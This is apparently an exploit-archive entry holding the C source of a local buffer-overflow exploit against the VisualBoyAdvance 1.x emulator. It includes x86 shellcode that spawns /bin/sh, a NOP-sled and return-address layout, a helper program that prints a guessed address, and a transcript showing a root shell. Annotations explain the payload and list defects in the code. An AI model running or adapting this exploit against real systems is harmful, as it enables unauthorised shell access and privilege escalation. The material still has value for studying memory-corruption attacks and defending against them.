Local exploit for VisualBoyAdvance 1.x.x; the binary is not setuid by default.
d7ad5d10ae68304f60fa8c23e1079b962f6c7588e14d261ff18c554610bcac6c
/*
VisualBoyAdvanced 1.x.x local Shell Exploit by Qnix (q-nix[at]hotmail.com)
Example :
[root@Qnix exp]# ls V* exp*c ret*c ret exp
exp ret.c VisualBoyAdvance.cfg
exp.c VisualBoyAdvance
ret VisualBoyAdvance-1.7.1-SDL-linux-glibc22.tar.gz
[root@Qnix exp]# ./exp
Segmentation fault
[root@Qnix exp]# ./ret
-1073745328
[root@Qnix exp]# ./exp -1073745328
VisualBoyAdvance-SDL version 1.7.1
Linux version
Seaching for file VisualBoyAdvance.cfg
Searching current dir: /root/tools/exp
Reading configuration file.
sh-3.00# :)
exp.c
**/
/*
 * Raw x86 Linux payload that main() places inside the overflowing argument.
 * Only the bytes are visible here; two things can be read straight off them:
 *   - the trailing run "\x2f\x62\x69\x6e\x2f\x73\x68" is the ASCII string
 *     "/bin/sh", matching the interactive shell in the transcript above;
 *   - "\xcd\x80" is the `int 0x80` Linux system-call instruction.
 * No byte is 0x00, so strlen()/execl() in main() treat the whole sequence as
 * one C string rather than cutting it short.
 */
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";
/*
 * Entry point: builds a 2300-byte string and hands it to ./VisualBoyAdvance
 * as its only command-line argument; the transcript above shows the target
 * overflowing a stack buffer with it. argv[1] is the candidate return
 * address as a signed decimal integer (ret.c below prints such a value).
 * Because the target is not setuid by default (see the file header), the
 * spawned shell carries only the invoking user's privileges unless the
 * binary has been installed setuid.
 *
 * Layout of `buffer` after the three loops, assuming a 32-bit `long`
 * (4 bytes, which the 0xbffffxxx addresses in the transcript imply):
 *   [0, 1900)     0x90 NOP bytes (sled)
 *   [1900, 1946)  the 46 shellcode bytes
 *   [1946, 2280)  the guessed return address from argv[1], repeated
 *   [2280, 2300)  never written (uninitialised stack contents)
 *
 * Review notes (defects in this file as written; left unfixed here):
 *  - atoi(), strlen() and execl() are used without any #include, so they are
 *    implicitly declared: invalid since C99 and a hard error in C23.
 *  - argc is never checked; a bare ./exp passes NULL to atoi(), which is
 *    undefined behaviour and is the likely cause of the "Segmentation fault"
 *    shown in the transcript.
 *  - On a host where `long` is 8 bytes the first loop writes 570 * 8 = 4560
 *    bytes into the 2300-byte array, overflowing this program's own stack.
 *  - Nothing guarantees a '\0' inside buffer[], so execl() may read past the
 *    end of the array (undefined behaviour).
 *  - `x < strlen(shellcode)` compares a signed int with size_t.
 *  - execl()'s terminating argument should be (char *)NULL, not a bare 0,
 *    for portability.
 */
int main(int argc,char *argv[])
{
char buffer[2300];
int i,x;
long *ptr = (long *) buffer; /* word-sized view of buffer for the address fill */
for(i=0 ; i < 570 ; i++)
*(ptr + i) = atoi(argv[1]); /* repeat the guessed return address across the buffer */
for(i=0 ; i < 1900 ; i++)
buffer[i] = '\x90'; /* NOP sled overwrites the first 1900 bytes */
for(x=0 ; x < strlen(shellcode) ; x++ )
buffer[i++] = shellcode[x]; /* i continues from 1900: shellcode follows the sled */
execl("./VisualBoyAdvance","VisualBoyAdvance",buffer,0); /* replaces this process on success */
return 0; /* reached only if execl() fails */
}
/*
ret.c
#include<stdio.h>
int main(void)
{
int i;
printf("%d\n",0xbffff250);
return 0;
}
*/